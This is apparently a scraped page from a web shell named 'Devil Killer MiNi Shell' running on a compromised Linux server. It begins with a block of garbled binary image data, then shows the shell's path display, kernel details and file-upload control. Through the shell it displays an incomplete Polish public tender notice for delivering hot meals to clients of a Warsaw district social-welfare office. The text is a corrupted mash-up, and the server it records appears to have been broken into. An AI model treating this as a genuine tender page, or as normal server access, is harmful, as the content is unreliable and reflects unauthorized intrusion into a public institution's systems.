JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241203/0062825801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przygotowywanie i dowożenie we wskazane miejsce gorących zestawów obiadowych klientom Ośrodka Pomocy Społecznej Dzielnicy Bemowo m.st. Warszawy i działającego w jego strukturze OWiRON. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK POMOCY SPOŁECZNEJ DZIELNICY BEMOWO M. ST. WARSZAWY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010773800</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Generała Tadeusza Pełczyńskiego 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-471</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">224871303</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@opsbemowo.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://opsbemowo.waw.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przygotowywanie i dowożenie we wskazane miejsce gorących zestawów obiadowych klientom Ośrodka Pomocy Społecznej Dzielnicy Bemowo m.st. Warszawy i działającego w jego strukturze OWiRON. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4d4bca75-3760-4346-8cf7-a97dd16810cd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00628258</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00226152/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przygotowywanie i dowożenie we wskazane miejsce obiadów klientom Ośrodka Pomocy Społecznej Dzielnicy Bemowo m.st. Warszawy , w tym do jednostek wsparcia w 2025r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4d4bca75-3760-4346-8cf7-a97dd16810cd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy e-Zamówienia, która jest dostępna pod<br/>adresem https://ezamowienia.gov.pl oraz poczty elektronicznej</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani konieczności logowania.<br/>3. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>Platformy e-Zamówienia, określone w Regulaminie Platformy e-Zamówienia oraz zobowiązuje się korzystając z Platformy e-<br/>Zamówienia do przestrzegania jego postanowień.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>5. Za datę przekazania oferty, oferty dodatkowej, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych<br/>w postępowaniu, przyjmuje się datę ich przekazania na Platformę e-Zamówienia.<br/>6. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści SWZ oraz załączników do zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>7. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>8. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22 458 77 99 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>9. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej: sekretariat@opsbemowo.waw.pl<br/>10. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej na adres<br/>sekretariat@opsbemowo.waw.pl . Sposób sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia<br/>30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 r., poz. 2452).<br/>11. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>12. Zamawiający nie przewiduje zwołania zebrania Wykonawców w celu wyjaśnienia wątpliwości dotyczących SWZ.<br/>13. Osobami uprawnionymi do komunikowania się z Wykonawcami ze strony Zamawiającego są:<br/>1)	w sprawach merytorycznych: Magdalena Trzeszczkowska, tel. 22 48 71 371, email m.trzeszczkowska@opsbemowo.waw.pl ;<br/>2)	w sprawach proceduralnych: Sławomir Janicki - tel. 22 48 71 377 email s.janicki@opsbemowo.waw.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych jest Ośrodek Pomocy Społecznej Dzielnicy Bemowo m. st. Warszawy (Ośrodek) z siedzibą przy ul. Pełczyńskiego 26, 01-471 Warszawa, adres e-mail:<br/>sekretariat@opsbemowo.waw.pl, 48-22-48-71-301, https://bemowo.um.warszawa.pl/waw/opsbemowo,<br/>https://opsbemowo.bip.um.warszawa.pl/default.htm .<br/>2. Administrator wyznaczył Inspektora Ochrony Danych Osobowych (IOD), z którym można się skontaktować mailowo pod adresem<br/>iod@opsbemowo.waw.pl lub pocztą na adres korespondencyjny Ośrodka wskazany w ust. 1.<br/>3. Administrator przetwarza dane osobowe w celu prowadzenia postępowań o udzielenie zamówień klasycznych oraz organizowania<br/>konkursów, których wartość jest równa lub przekracza kwotę<br/>130 000 złotych netto na podstawie ustawy z dnia 11 września 2019 r. prawo zamówień publicznych (ustawa PZP).<br/>4. Odbiorcami danych osobowych mogą być:<br/>1) organy władzy publicznej i podmioty uprawnione do tego na podstawie przepisów prawa, w tym osoby i podmioty, którym zostanie<br/>udostępniona dokumentacja postępowania na podstawie art. 18 i 74 ustawy PZP oraz podmioty kontrolne i sprawujące nadzór;<br/>2) Prezydent m st. Warszawy w zakresie zadań związanych z obsługą jednostek organizacyjnych m.st. Warszawy, uprawnione<br/>podmioty, którym Administrator zleca usługi (np. operator pocztowy) lub dostarczające administratorowi obsługę np. informatyczną,<br/>w tym hostingową, prawną, brakowania dokumentacji, na podstawie umów powierzenia przetwarzania danych;<br/>5. Dane osobowe nie będą przekazywane do państwa trzeciego ani do organizacji międzynarodowej.<br/>6. Dane osobowe będą przechowywane przez okres niezbędny do realizacji celów przetwarzania (minimum przez okres lat 4 od dnia<br/>zakończenia postępowania o udzielenie zamówienia) jednak nie krócej niż okres wskazany w przepisach o archiwizacji (ustawy z<br/>dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach), w oparciu o instrukcję kancelaryjną i archiwalną obowiązujące<br/>w Ośrodku.<br/>7. W związku z przetwarzaniem danych osobowych przysługują prawa: dostępu do treści swoich danych osobowych (art. 15 RODO)<br/>z zastrzeżeniem, że udostępniane dane nie mogą naruszać tajemnic prawnie chronionych, do których zachowania zobowiązany jest<br/>Administrator, prawo do ich sprostowania (art. 16 RODO), jak również prawo żądania ograniczenia ich przetwarzania (art. 18 RODO)<br/>oraz prawo do złożenia żądania usunięcia danych (art. 17 RODO). Przy przetwarzaniu danych na podstawie i w celu określonym w<br/>ust. 3 niniejszej informacji nie mają zastosowania prawa do przenoszenia danych (art. 20 RODO) i sprzeciwu wobec przetwarzania<br/>danych (art. 21 RODO).<br/>8. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego – Prezesa Urzędu Ochrony Danych Osobowych ul.<br/>Stawki 2, 00-193 Warszawa jeśli Pani/Pana zdaniem przetwarzanie narusza przepisy prawa.<br/>9. Decyzje związane z przetwarzaniem danych nie będą podejmowane w sposób zautomatyzowany a dane nie będą podlegały<br/>profilowaniu (art. 22 RODO), co oznacza, że żadne decyzje nie zapadają wyłącznie automatycznie oraz że nie buduje się żadnych<br/>profili osób.<br/>10. Obowiązek podania danych osobowych jest wymogiem ustawowym.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Przy przetwarzaniu danych na podstawie i w celu określonym w powyższej informacji nie<br/>mają zastosowania prawo do przenoszenia danych (art. 20 RODO) i sprzeciwu wobec przetwarzania danych (art. 21 RODO) oraz<br/>prawo do złożenia żądania usunięcia danych (art. 17 RODO)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IOD.26.1.5.2024.SJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 464588,96 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 350156,18 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przygotowanie i dowożenie we wskazane miejsce w granicach administracyjnych Dzielnicy Bemowo m. st. Warszawy (tj. miejsce zamieszkania osób korzystających z posiłków) gorących zestawów obiadowych dla uprawnionych klientów Ośrodka Pomocy Społecznej Dzielnicy Bemowo m.st. Warszawy przez 7 dni w tygodniu, w tym soboty, niedziele i święta. <br/>2)	Przewidywana, szacunkowa liczba wydawanych zestawów obiadowych w skali realizacji całej umowy wyniesie do 11 124 sztuk (zestawów). Zamawiający ma prawo do ograniczenia liczby zamawianych gorących posiłków przy czym Zamawiający zamierza wykupić nie mnie niż 8 900 posiłków. Ostateczne całkowite wynagrodzenie za obiady wydane przez cały okres obowiązywania umowy wynikać będzie z faktycznej liczby wydanych obiadów. Wykonawcy nie przysługują względem Zamawiającego jakiekolwiek roszczenia z tytułu niezrealizowania pełnej liczby przedmiotu zamówienia.<br/>3)	Przewidywana liczba osób zgłoszonych do korzystania z pomocy w formie gorącego posiłku – obiadu wynosić będzie średnio ok. 35 osób.<br/>4)	Liczba osób, a tym samym liczba zamawianych zestawów obiadowych, może być zmienna i różnić się w poszczególnych miesiącach. <br/>5)	Gorące zestawy obiadowe dla osób uprawnionych będą dowożone do ich miejsca zamieszkania na terenie Dzielnicy Bemowo przez Wykonawcę w szczelnie zamkniętych, termicznych i jednorazowych biodegradowalnych pojemnikach.<br/>6)	Zestawy obiadowe będą dowożone przez Wykonawcę do miejsca zamieszkania osób na terenie Dzielnicy Bemowo od poniedziałku do niedzieli w godzinach 13:00 – 15:00.<br/>7)	Wszelkie koszty związane z dowozem zestawów obiadowych ponosi Wykonawca.<br/>8)	Istnieje możliwość dowożenia w uzasadnionych przypadkach, suchego prowiantu jako zamiennika za gorący posiłek, po uprzednim pisemnym uzgodnieniu Wykonawcy z Zamawiającym.<br/>9)	Sposób zgłaszania osób uprawnionych do otrzymania zestawów obiadowych:<br/>a)	Upoważniony pracownik OPS będzie przekazywał Wykonawcy listy imienne klientów z adresami zamieszkania i numerami telefonów wraz z liczbą zamówionych zestawów obiadowych dla każdej osoby uprawnionej nie później niż 2 dni robocze przed końcem danego miesiąca, na każdy następny miesiąc;<br/>b)	W przypadku zmian w danym miesiącu dotyczących liczby osób lub liczby zestawów obiadowych, informacja o tych zmianach będzie przekazana do godz. 9.00 dnia poprzedzającego dowiezienie obiadów.<br/>10)	Wykonawca jest zobowiązany do przygotowania i wydawania obiadów z zachowaniem poniżej określonych warunków.<br/>11)	Zestawy obiady powinny być urozmaicone, składać się z tradycyjnych potraw złożonych z co najmniej dwóch dań:<br/>a)	I danie: zupa z pieczywem;<br/>b)	II danie wieloskładnikowe, surówka/warzywa oraz kompot lub napój.<br/>12)	W ciągu siedmiodniowego żywienia klienci powinni otrzymać cztery razy w tygodniu obiad z porcją mięsa (np. sztuka mięsa, kotlet schabowy, udziec z kurczaka, kotlet mielony), raz w tygodniu obiad z rybą, w pozostałe dni dowolność ustalenia menu. <br/>13)	Poszczególne osoby mogą, w konkretnych miesiącach otrzymywać obiady w dniach dostosowanych do indywidualnych potrzeb, tj. w mniejszej liczbie niż 7 dni w tygodniu.<br/><br/>Zapisy wspólne dotyczące zarówno Części I jak i Części II przedmiotu zamówienia.<br/>1)	Wymagana wartość energetyczna j minimalna wymagana waga/objętość gotowych potraw - szczegółowo opisane w Rozdz. III SWZ<br/>2)	Posiłki będą przygotowane z pełnowartościowych produktów, z uwzględnieniem świeżych warzyw i owoców sezonowych.<br/>3)	Co tydzień - najpóźniej do piątku do godz. 16.00 Wykonawca przekaże Zamawiającemu (pocztą elektroniczną) jadłospis na tydzień następny. Jadłospis będzie obejmował gramaturę poszczególnych dań.<br/>4)	Wykonawca realizując przedmiot zamówienia zobowiązany jest do przestrzegania przepisów prawnych w tym również przepisów w zakresie przechowywania i przygotowywania artykułów spożywczych.<br/>5)	Posiłki oraz miejsce ich przygotowania i wydawania muszą spełniać wszystkie wymogi ustawy z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia (t. j. Dz. U z 2023 r. poz. 1448).<br/>6)	Samochód/samochody, którym dowożone będą posiłki będzie dostosowany do przewozu żywności, spełniający wszystkie wymagania określone stosownymi przepisami. Wykonawca musi dysponować zaświadczeniem/decyzją/opinią stwierdzającym zatwierdzenie środków transportu przez Państwowa Inspekcję Sanitarną.<br/>7)	W przypadku awarii lub innych nieprzewidzianych zdarzeń Wykonawca jest zobowiązany zapewnić posiłki o nie gorszej jakości na swój koszt z innych źródeł.<br/>8)	Rozliczenie między Zamawiającym i Wykonawcą odbywać się będzie raz w miesiącu do 10 dnia następnego miesiąca, na podstawie prawidłowo wystawionej przez Wykonawcę faktury z podaną liczbą wydanych obiadów, co Wykonawca udokumentuje przedstawiając wygenerowany raport z liczby wydanych obiadów w miesiącu poprzednim. <br/>9)	Złożona faktura wraz z listą osób i liczbą obiadów podlega sprawdzeniu pod względem zgodności dostarczenia do klientów z liczbą wydanych obiadów przez Wykonawcę w miesięcznym okresie rozliczeniowym.<br/>10)	Za prowadzenie dokumentacji stanowiącej podstawę rozliczenia liczby obiadów Zamawiający nie przewiduje dodatkowej opłaty, stanowi to koszt Wykonawcy.<br/>11)	Zamawiający zastrzega sobie prawo weryfikacji jadłospisu oraz przeprowadzenia kontroli jakości, wartości odżywczych oraz gramatury potraw przez wytypowanych pracowników Zamawiającego. W szczególności poprzez:<br/>a)	porównanie zgodności z jadłospisem,<br/>b)	ocenę organoleptyczną (ocena wyglądu potraw, zapachu, oraz smaku poprzez degustację),<br/>c)	ważenie potraw,<br/>d)	porównanie z tabelami wartości odżywczych Instytutu Żywności i Żywienia.<br/><br/>Klauzule społeczne szczegółowo opisane w Rozdz. III SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 256676 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione wg wzorów podanych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w żywieniu zbiorowym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe kucharza</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie dietetyka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 